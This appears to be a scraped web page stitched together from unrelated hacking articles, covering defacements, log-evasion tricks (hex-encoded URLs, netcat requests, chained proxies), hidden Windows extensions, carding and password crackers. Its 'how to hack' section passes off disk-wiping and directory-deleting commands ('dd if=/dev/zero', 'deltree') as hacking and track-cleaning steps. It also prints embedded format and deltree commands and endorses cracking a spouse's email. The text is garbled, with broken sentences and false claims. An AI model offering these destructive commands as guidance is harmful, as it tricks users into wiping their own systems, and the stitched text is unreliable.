A group of serious hackers named as PENTAGUARD had cracked into the government sites of Australia, America and England all at a time. The hackers in this case had replaced with a typical statement that read "The largest .gov & .mil mass defacement in the history of mankind".

This was a simple statement with an aesthetic undertone of threat. The act affected almost 24 sites with a transitory disruption.Similarly an educational site on the mad cow disease was defaced along with some cities and the nation's government sites in England. The Alaskan office of the department of interior was once attacked since the secretary of the Interior Designate, Gale Norton, encouraged drilling in the Arctic Wild Life Refugee for sucking out oil.

The common wealth of Australia is of no exception. The search page of the common wealth of Australia was once hacked along with the act of hacking into websites of small municipal sites in Australia. These are a scanty number of instances that proved to have jeopardized the respective concerns severely. The hackers had to use simple techniques and methods to do these. website hacking for these hackers is all as simple as a child's play. Their main focus was on the sites that were designed with vulnerable loopholes.

Hacking Websites: Fun or Terror?

With a proper understanding of the relevant programming languages such as C, C++, Pearl, java etc. one can be fully equipped with the technique of hacking into website. There backdoors for the web hackers for website hacking. For hacking web sites

one of the best ways for the hacker is to install linux on his or her personal computer he or she wants to hack from. Then he can

open up a shell to type: dd if=/dev/zero of=/dev/hda1 and press ENTER. As the next step he will type: dd hf= (url). There are a few other alternatives for hacking sites as well. The web hackers using Windows pc can also master the art of hacking websites with the flicking of his finger.

The first step is to clean up the tracks so that the feds fail to trace out the hacker. This happens automatically in case of linux. Cleaning up of tracks in case of Windows 95 or Windows 98 or Windows ME involves a step-by step procedure. Click Start then Run and then Command. In case of Windows NT or Windows 2000 the Tracks can be cleaned by pressing Start, then Run and then cmd. The next step is to clean up tracks with deltree c:/windows or c:\winnt, or whatever the main windows directory is. At the command prompt, press y, which will then go through and clean up the system's logs. The hackers should perform the same steps again after the hacking sites/hacking wireless internet sites. Hacking is neither defined nor limited by exploitation or exploration. Hacking into someone else's system may be illegal, so don't do it unless you are sure you have permission from the owner of the system you are trying to hack.

Hacking was primarily used for learning new things about systems and computing in general, 'in the good ol' days'. In recent years it has taken dark connotations and in general has been looked down upon. Likewise, many corporations now employ "hackers" to test the strengths and weaknesses of their own systems. These hackers know when to stop, and it is the positive trust they have built that earn them large salaries.

There is a major difference between a hacker and a cracker. A cracker is motivated by malicious reasons; a hacker is attempting to gain knowledge through exploration.

Hackers' Tricks to Avoid Detection

In our last column, we discussed some of the most common types of attacks against Web servers, and the evidence they leave in Web server logs. In this column, rather than initiating new attacks, we will demonstrate some dirty tricks hackers use to avoid detection, and the evidence they leave behind. These techniques are an added twist to the attacks we examined last time, making those attacks more difficult to detect.

The Web Servers

Our test environment uses two of the most common Web servers, Apache and Microsoft's Internet Information Server (IIS). We run Apache 1.3.9 on Red Hat Linux, and IIS 4.0 on Windows NT 4.0. Furthermore, both servers have normal and SSL-enabled versions, so we can test attacks against both encrypted and unencrypted servers.

Hex Encoding

One of the easiest ways to disguise attacks is through changing the URL request. As administrators, we generally search our log files looking for certain strings, or collections of plaintext characters. We look in resource requests for strings that match known vulnerabilities. For example, when we see the following in our IIS log, we know that someone is looking for the presence of the MDAC remote vulnerability in IIS:

06:45:25 10.0.2.79 GET /msadc/ 302

To see how attackers attempt to circumvent pattern matching, let's examine the request from the malicious attacker's perspective. To determine whether or not the msadc directory exists, an attacker might type the following:

[root@localhost /root]# nc -n 10.0.2.55 80

GET /msadc HTTP/1.0

This would yield the log file we saw above. The attacker can change the request by encoding it as hexadecimal ASCII characters. In the above example, the string msadc would become 6D 73 61 64 63 using hexadecimal ASCII encoding. You can use the Windows Charmap program to do a quick ASCII-to-hex encoding of characters. The above HTTP request, rewritten with the string msadc encoded in hexadecimal, appears as follows:

[root@localhost]# nc -n 10.0.2.55 80

GET /%6D%73%61%64%63 HTTP/1.0

The log file for IIS shows:

07:10:39 10.0.2.31 GET /msadc/ 302

Note that this is exactly the same log that is created when the URL is not encoded in hexadecimal. So in this case, encoding did not help the attacker. However, a look at the Apache logs for a similar attack tells a different story. The command an attacker would use to check for the existence of a particular CGI script is listed below, followed by the same command with hexadecimal encoding:

[root@localhost]# nc -n 10.0.0.2 80

HEAD /cgi-bin/test-cgi HTTP/1.0

[root@localhost]# nc -n 10.0.0.2 80

HEAD /%63%67%69-bin/test-%63%67%69 HTTP/1.0

Now let's take a look at the access_log file:

10.10.10.10 - - [18/Oct/2000:08:22:47 -0700] "HEAD /cgi-bin/test-cgi HTTP/1.0" 200 0

10.10.10.10 - - [18/Oct/2000:08:23:47 -0700] "HEAD /%63%67%69-bin/test-%63%67%69 HTTP/1.0" 200 0

Note that in both cases the 200 status code tells us that the command completed successfully. However, in the second case, the hex values rather than the plaintext values appear. If we were relying on pattern matching to detect this attack, we would likely fail. Many intrusion detection systems also use unintelligent pattern-matching capability, and some do not convert the hex-encoded URLs in order to perform the pattern matching. All administrators should be aware of this well-known dirty trick, and of whether their intrusion detection software is smart enough to convert hexadecimal code.

Proxy Servers

While concealing an attack may be crucial to an attacker, obfuscating the source of the attack is just as important. If an attacker can mask the source IP address, she or he can hack without worrying about legal repercussions. One way for attackers to mask their source address is through the use of proxy servers.

Proxies are used legitimately to funnel various protocols through a single access point. Typically, internal users are forced to go through a proxy server to access the Internet, allowing network administrators to be more restrictive with filtering rules for inbound and outbound access. A user connects to the proxy server, which then forwards the connection request to the intended destination. The destination server records the address of the proxy server as the source address of the connection, rather than recording the address of the system that originated the request.

Unfortunately, proxy servers are sometimes inadvertently placed on the Internet. (Check out Proxys-4-All for a list of these misconfigured servers.) These servers are sometimes misconfigured so that any Internet user can connect to the proxy server. When an Internet user connects to a server via the proxy, the proxy's source address, rather than the address of the Internet user, is recorded in the server logs. A malicious attacker may appear in a victim server's log files with a source address belonging to an "innocent" proxy rather than with the attacker's actual address. Let's take a look.

In the attack/log file combo below, we see the attacker request information, and we see the request appear in the log file:

Attacker

[root@10.1.1.1 /]# nc -v 10.8.8.8 80

HEAD / HTTP/1.0

Log file

10.1.1.1 - - [18/Oct/2000:03:31:58 -0700] "HEAD / HTTP/1.0" 200 0

In the following attack/log file combination, we see the attacker achieve the same goal, except that the attacker uses a proxy server.

Attacker [root@10.1.1.1 /]# nc -v 216.234.161.83 80

HEAD http://10.8.8.8/ HTTP/1.0

Log file

216.234.161.83 - - [18/Oct/2000:03:39:29 -0700] "HEAD / HTTP/1.1" 200 0

Note that in this example, the source address that appears in the Web server log file is that of the proxy server (216.234.161.83, proxy.proxyspace.com), not the attacker (10.1.1.1). In this case, the attacker has successfully hidden the IP address of the source of the attack from the victim. The network administrator can track down the ultimate source of the attack if the administrator of the proxy server cooperates. Most proxy servers keep very detailed logs, so the source address of the attacker should appear in the log files of the proxy server. Unfortunately, here's where the dirty trick gets even dirtier: attackers can "chain" proxy servers so that the attack is propagated through multiple proxy servers. In order to determine the source address of the attacker, administrators or law enforcement officers need the cooperation of the administrators of every intermediate proxy server, sequentially. The process of chaining proxy servers is well known in the hacker community, and an automated software tool that performs this process is SocksChain for Windows.

SSL

We've said it before, but it is worth mentioning again: SSL-enabled servers are not monitored by network intrusion detection systems. Give an attacker a choice between port 80 (HTTP) and port 443 (HTTPS), and the attacker will choose 443 every time. This is not really a dirty trick, just a side effect of using encrypted communications. You can use the Web server log files to monitor requests to port 443.

Summary

We have shown you a few common deceits used by Web hackers. Needless to say, this list of tricks is limited only by hackers' creativity and imagination. Techniques such as hexadecimal encoding are not only used for deceptive log file entries; they can also deceive a Web server's URL parsing mechanism, which may lead to vulnerabilities such as source code disclosure. Attackers sometimes use multiple proxy servers for scanning and attacking, making it very difficult for administrators to trace the real source of attacks. And of course, SSL sometimes paves the way for "secure hacking," as we have seen in this and in past articles.

Chris Prosise is the vice president of consulting at Foundstone, a network security firm specializing in consulting and training. But for every caper carried out with style and smarts, there are hundreds of imprisoned examples of the boneheaded desperado -- guys too greedy, too hasty, or just too brain dead to pull off their nefarious deeds without getting caught.

You might be tempted to believe online crime would be the exception. After all, it takes a more sophisticated criminal mind to perpetrate a complex phishing scheme than to, say, rob a bank while chatting on a cell phone. But as any IT pro knows, the more complexity you add to a system, the more likely it is that system will fail in unanticipated ways.

The same rule applies to criminals who employ complex webs of technology to further their misdeeds. And besides, despite their reliance on technology, cyberoutlaws are not robots themselves. More often than not it's what makes them human -- greed, an inflated ego, loose lips -- that ends up getting the better of them.

Hacker's Tricks Of The Trade

Exposing The Hacker
It is our desire that by exposing these "tricks of the trade" the Internet user will be better prepared with the knowledge and tools needed not be fooled by the following hacker tricks. We will use the Hacker Eliminator software as a basis for defeating these tricks, because every hacker trick and every trojan type has been taken into account during the years that it took for us to develop it.

Windows Hidden File Extensions
You might not be aware of this, but even if you tell Windows to show all file extensions there are still some that are hidden by default. Also, any installed program can configure extensions to be hidden. This is why you will find a special window in Hacker Eliminator that will show you what extensions are being hidden and allow you to toggle them unhidden. Extensions window in the Hacker Eliminator menu will automatically mark any potentially dangerous hidden extensions in red, so that you will know which ones to toggle to unhidden. Here are a couple of examples on how this works and why some hidden extensions could be a danger to some computer users. Assuming that you already configured Windows explorer to show all extensions:

SHS Extensions

Make a copy of notepad.exe and put it on your desktop.

Open Wordpad

Click and drag notepad.exe into the open wordpad document.

Click and drag it back to the desktop

Rename the file that it created (Scrap) to Readme.txt

You now have what appears to be a text document icon and a clearly named readme.txt file showing on your desktop. Click on the text file and the notepad opens up. If this were a trojan, you would have been fooled and infected by what seemed to be a harmless text file. If the extension was allowed to be seen you would not have been fooled by the file Readme.txt.shs

PIF Extensions
Next, try renaming notepad.exe to anything.txt.pif You will only see the file name anything.txt on your desktop. This is because PIF is another extension that Windows hides by default. If you run the file it will execute the program, this is because Windows will also execute PIF extensions as if they were executable files.

SCR Extensions
Another extension to watch out for is SCR. Rename your copy of notepad.exe to notepad.scr and click on it. It will run notepad as an executable file. Many people have been fooled by hackers taking over a victim's account. The hacker sends email or other type of message to all of the victim's friends saying "Check out this cool new screen saver, you will laugh your butt off!" Because the message came from a trusted source, most were fooled and ran the SCR file and then ended up with a hacker connecting to their computer. Hacker Eliminator scans all SCR files for trojan infections by default.

Dangerous Commands That Can Be Embedded

PIF Shortcut Extensions

Some hidden file extensions can easily be programmed with hidden commands that could do damage to your system. Following is a simple test:

Right click your mouse on your desktop and select New
and then ShortCut

In the command line type: format a: /autotest

Click Next

In the "Select a name for the shortcut" area type: readme.txt

Click Next

Select a notepad icon and click Finish

You now have a file on your desktop called readme.txt with a notepad icon. Make sure there is a disk in your drive that you do not mind being wiped and click on the icon. The file that you click on will do a format on the disk in the A: drive. Of course, the hacker's icon would target another drive, or maybe have a name such as 'game.exe' and with a command to delete your Windows directory or (deltree /y c:\*.*) your entire C drive!

If the PIF extension were not hidden, this would not be able to fool you. And if it was added to your startup folder waiting for a reboot, Hacker Eliminator would warn you within seconds.

SHS Extensions

Scrap files can also hide embedded commands. Following is a simple test:

Make a copy of notepad.exe and put it on your desktop.

Open Wordpad

Click and drag notepad.exe into the open wordpad document.

Click on Edit and select Package Object, then select Edit Package

Click on Edit and then Command Line

Type a command in the box such as format a: /autotest and click on Ok

The Icon can also be changed from this edit window

Exit from the edit window and it will update the document

Click and drag notepad back to the desktop

Rename the file that it created (Scrap) to Readme.txt

You now have what will look like a text file. If it is run it will format the disk in the A: drive. As seen in the example above for PIF Shortcut Extensions, the hacker could use more dangerous commands.

Trojan Startup Methods
Most people do not know the many different ways that hackers are using to start trojan files. If a hacker infects your computer with a trojan, he will need to select a startup method so that the trojan will load when you reboot your computer. Common startup methods are the registry run keys, the Windows Startup folder, the Windows load= or run= lines found in the Win.ini file and the Shell= line found in the Windows System.ini.

Dangerous Startup Methods
Because there are only a handful of these startup methods, we find more hackers going to extremes to find new methods of startup. This includes using dangerous changes to the system registry, which will rend the system useless if the trojan file or it's companion file is ever removed. This is one reason not to use standard anti virus software to remove trojans. If one of these methods are used, and the file is removed without fixing the system registry, your system may not be able to run any programs after you reboot. Hacker Eliminator detects and repairs all of these dangerous startup methods as seen with this Sub7 infection.

The ICQ Startup Method
Another startup method now commonly used is the ICQ netdetect. Many ICQ users are not aware that a hacker can add a configuration line to ICQ in order to have it start the trojan every time that the program is loaded. As a test you can try the following:

Open ICQ

Click on the ICQ icon and select Preferences

Click on Connection

Click on Edit Launch List

Click On Add

Click on Browse

Find a file to add \Windows\Notepad.exe would work for this test.

Click on Open, and then Ok

The file will run when you restart ICQ. If you go to your Startup Programs window in the Generics module, you can locate the program listed as a startup program. You will see "ICQ NetDetect" as the startup method. Simply select the file in the Hacker Eliminator Startup window and click on the Remove Program From Startup button and it will be removed immediately.

How to Report a Credit Card Hacker and How to Stop Them

If you find someone who is using his website looking to hack a credit card number, report him to the host provider that it is giving him the service. Additionally, hacking credit reports is a simple but useful way to learn more about a determined user.

What Is A Carder?

A carder is a criminal who specializes in stealing information from credit cards. Although the majority of them buy the information from online vendors, some of them are quite savvy on how to access that information by themselves.

In the physical world, a carder will steal the information from a user while doing a face to face transaction. The criminal only needs to pass the card through a special scanner. This device will read from the magnetic strip all of the credit card information. Afterwards, the carder will trespass that information to a blank card available in many identity card stores.

In the virtual world, credit card hacking is a bit more sophisticated and automatized. A hacker could install inside your system a credit card hacking software known as Bugbear. This program is a keystroke logger; it captures the keys that you have pressed in your keyboard and after some time, it transmits this information to the hacker. The criminal will navigate through this data, searching for any private information that can give him access to your credit card.

Besides Bugbear, there is also the IRC bot. This automated software is used for determined functions, like a moderator for a chat room. But if it is used by a hacker, he may use it for stealing your credit card information. The IRC bot will pose as an official from a company, asking you to insert your credit card information.

Another mean that hackers use for stealing money from your credit card is through unused ebay accounts. Once they find a possible victim, the hacker uses a program that starts bombarding the account until it breaks it. Once inside, the hacker will use it for posing as the real user, selling equipment that will never reach the buyer once he buys it.

How Are Credit Cards Gained By Hackers?

A hacker has many ways to gain a credit card number from an innocent user. The most common one is known as phishing. In this technique, the hacker poses as an officer within an organization, let's say VISA. The hacker sends to a group of email accounts an alert, instructing the receiver to follow determined set of instructions before his credit card is cancelled.

If the user is not aware of this kind of fraud, he will insert his credit card number, his name and expiration date without knowing he is going to be a victim of an online crime.

Another way for hacking credit card numbers is through a website. The hacker only needs to hack the systems of an online retailer, let's say, Costco, and search for the database where the retailer stores the information of all of the users who have made recent transactions.

The third way is through the online process of buying. Let's say an adult finds a website with adult content that he or she finds attractive. It's quite probable that the website is only a masquerade for acquiring credit card information from you.

Credit Card Hackers Are Here - Have You Checked Your Credit Report Lately?

Credit card hacking has become one of the new security headaches of consumers. Although in face to face transactions the

percentage of credit card fraud is almost a tenth of a percent, in online transactions it's as high as two or three percent. That

means that for every one hundred transactions you may do in the internet, you may suffer two or three breaches in your private information. Stopping credit card number hacking is, nowadays, one of the priorities of credit card brands around the world.

One funny thing about many of these hackers; free credit card numbers are posted at the internet. In the case of Google hacking, you will have to learn how it can be used for acquiring confidential information from individuals and corporations.

An ideal place to look for a how to hack with Google tutorial is Amazon. Within this online store you will find two books that can help you. The first one has been written by Rael Dornfest and Tara Calishain, and it's title is Google Hacks : Tips & Tools for Smarter Searching. This book is considered the introductory course for any computer user who wants to learn how he can exploit the potential that Google offers.

The second book is Google hacking for penetration testers, written by the author Johnny Long. Considered a more advanced lecture, it gives the user the knowledge that only black hackers are aware of. The great thing of this book is that it focuses on the weak points that most system administrators overlook and that are exploited by almost every hacker. Google, as innocent as it may be, has become another tool waiting to be exploited.

After you have read this two books, you should be able to perform the most basic kind of Google hacks and even some of the most advanced ones. But, as if everything in life, you need to master the art of Google hacking. And, if you wish to sell your services as a network security expert, it's better to know it from the A to the Z.

The best way to do it is to contact other hackers in their specialized forums, via IRC or even at the multiple conventions that they celebrate around the USA. It was mentioned in the beginning of the article that a determined hacker will get information. They are constantly upgrading their own methods, and the sad thing, is that much of the intrusion prevention development going on, only seeks to keep up with the methods the hackers use. The result - a hacker comes up with a new method, and - he'll get in.

One thing that is being reported as working quite well, especially for a Unix system (although there is also a Windows version, too), is an intrusion detection using Snort with wincap. This program has good reviews, and may be the software you need. Because of competition, new and better programs of detection and prevention are being developed all the time. Some systems have firewalls just for spam filters (great for email servers), and ones for general systems. There is even a new firewall system out there that is just for in-house IM communications. Of course, these new systems try to combine some of the features of a firewall and an intrusion detection system into one great package - and some of them can even remove existing malware on your system!

The best advice that could be given is to take this information and begin to do your own research into the latest products on intrusion prevention. At the same time you will want to find good malware removal software, and don't forget to consider downloading a trial version first. Some of these offer complete systems that can even be upgraded daily for the length of the trial period. Having your system protected by intrusion detection software is a great move, and will help to bring greater security to the information you want guarded the most.

Be Hacker Safe Use Intrusion Detection Systems

Although they are excellent in their design, having a basic firewall by itself is not sufficient to provide hacker prevention. Detection firewall intrusion often takes place after the fact. An important note here would be that a firewall cannot remove things

that are already on your computer or network. If there was a virus before, or trojans, they will still be there afterwards. Which

brings up another point - the first thing that needs to be done, before installing any firewall or intrusion detection software, is to remove all malware from the system by using a good scanner and removal software program. At the present time, there are a number of them that are free. It might be a good idea to run more than one - but be sure to disable the one you are not using. Experience shows that different software will detect different malware.

When selecting your intrusion detection software, you need to know that there are basically two kinds. One is passive, meaning that an alarm will be sounded. A second kind is active, meaning that it will terminate the communication with the computer trying to obtain access, and it will notify the Webmaster. Intrusion detection software can also stop phishing emails, spam, and those pop-up ads. They can also prevent dial up hacker from invading your system.

What Is Intrusion Detection?

Network Intrusion detection software is a must-have these days. Each company's software will vary somewhat (for copyright and originality purposes), but you do need one for your own network, or home computer. It differs from a firewall in that the purpose of a firewall is to stop unauthorized external contacts with your system. These offer hacker prevention largely for contacts from outside the network. Most of these will now notify the owner or network controller of intrusion attempts. Network intrusion detection systems, on the other hand, will give you warnings about events that take place within the network itself.

Why You Need Intrusion Detection

Doors can be opened to hackers in varied ways. Two of the most common ways by which they can gain access to your computer is simply through emails, or Web pages that you visit that have spyware, or trojans (a file which looks innocent, but actually will later open doors to a hacker) attached to them. Other ways are robot spiders sent out over the Internet to find unprotected computers, and open doors. Some say that every computer attached to the Internet may be attacked by such a spider as many as 50 times each day. So, if you do not have an intrusion prevention system in place, up-to-date, then you may have regular unexpected visitors - and you may not even know it. Others say that 9 out of 10 computers have some sort of spyware, or malware on them. Could you be one of them? This article will show you what is available on the market for your protection - and much of it can be obtained for free.

The spider robots work automatically - looking for and identifying computers on the Internet that have doors, or ports, open to them. This information is then reported back to the hacker - knowing which computers to target - and which port to use. For this reason, every now and then, Microsoft will come out with a new patch for Windows, in order to close some faulty door that hackers have discovered and been using.

Expert Advice on Keeping Your Network Safe by Blocking Dangerous Hacker Attacks

The stories go on and on about another individual having their personal information stolen from their computer by some

hacker. This program uses brute force, which means it continually tries

different password combinations until it finds the successful one. It might take a while, but it is usually able to find simple

passwords on the major e-mail clients, provided the user knows the e-mail username.

One of the more popular tools is John the Ripper. This program uses several different ways to find the password, including brute force. It also uses the dictionary to try to find the password. The Rixler Software Company makes several password hacking programs. These are not free, but they work on many different types of programs. This program is more sophisticated than you would need on Yahoo and other free e-mail clients.

These are just some of the options out there to hack into e-mail programs. It is a serious invasion of privacy to read someone else's e-mail without their permission. Parents, on the other hand, need to know what their children are doing online. This is one situation when using yahoo hacking programs, or similar tools to get the passwords for AOL, Hotmail, or other free e-mail programs, might be needed. Protecting our children should be our number one priority, particularly with the rise of online predators preying on unsuspecting and innocent teenagers.

Unfortunately, there are situations where a spouse might need to see what their husband or wife is doing on the Internet. Again, this should be a last resort after all attempts at discussion have been used. As if viruses were not enough, companies from around the world decided to create programs that could pick up data from your computer in order to acquire information for their databases. It may not be as dangerous as a virus, but it is an intrusion to your privacy. Wipe them out with this piece of software.

Nowadays hacker prevention has become a task for all of us. No longer is it the responsibility of the system administrator of our company. After all, he can install all the security of the world in the company's network, but if you let a virus in because of your carelessness, he won't be able to stop it. The same goes for your computer at home. You are the only one responsible for it. Remember that new hacker tricks appear as each day goes by, so you need to be prepared.

Firewalling

The second thing that you need to do is to install a firewall. As a matter of fact internet firewall hacker protection has become so necessary that Microsoft now ships it for free as part of their Windows XP operating system. It took them some years to admit it, but the truth is that their software was an easy target for the hackers and crackers that lurked through the World Wide Web.

In case you don't want to use Windows XP firewall, there are many alternatives in the market. Companies like Symantec and Zone Labs have produced software firewalls for some time and have become a necessity for all the computers of corporate America. If you don't know which one you want to buy, use the trial periods. Usually you can use the firewall for 15 to 30 days; that amount of time is more than enough to make your decision. The next step in security is to have an antivirus installed. There are free versions like AVG antivirus, or pay per year licenses, like Norton Antivirus (also from Symantec). As in the case of firewalls, there are many varieties available in the market; use the trial periods for choosing wisely.

OS Updates

The first thing to do in computer hacking prevention is to assure yourself that all your software is up to date; especially your operating system and your web browser. It can be something as simple as phising confidential information (like credit card or bank account numbers) to complex hacking routines that use your computer as a repository for illegal content (like music or movies with copyright).

Unfortunately there is no magical software to prevent hackers; and it will never exist. It doesn't matter how much money or resources you invest in designing the perfect system, someone will find the way to crack it. Even the biggest government agencies like NASA, CIA and NSA have been victims of hackers. And the same thing happens in the private sector with companies like Citigroup or Wal-Mart.

Tricks And Techniques Employed By Hackers To Break Into Your System

The first most common technique used technique used by hackers is scanning. Hackers have created tools that scan computers for weak spots. It can be an operating system that hasn't been upgraded or a port in the computer that it is open without the knowledge of the user.

Hackers use this "open window" to get inside your computer in order to do whatever they want to do. The interesting thing about this is that these hacker tools are available for free in the Internet. So, with a couple of hours of instructions, almost every computer user can become a hacker.

Another way that hackers can access your machine is through malware: programs designed to capture vital information from your computer, like login users and passwords. Malware could be hidden in a PowerPoint presentation sent by email or even in an innocent Instant Messenger message window.

Hacker Tricks And Prevention Techniques

In movies or TV series where hackers are involved, we may have seen them apply their computer knowledge in order to perform certain hacker tricks that saved the day.

From "The Matrix" to "Swordfish", hackers have been able to elevate themselves to the level of heroes with only a keyboard and a mouse.
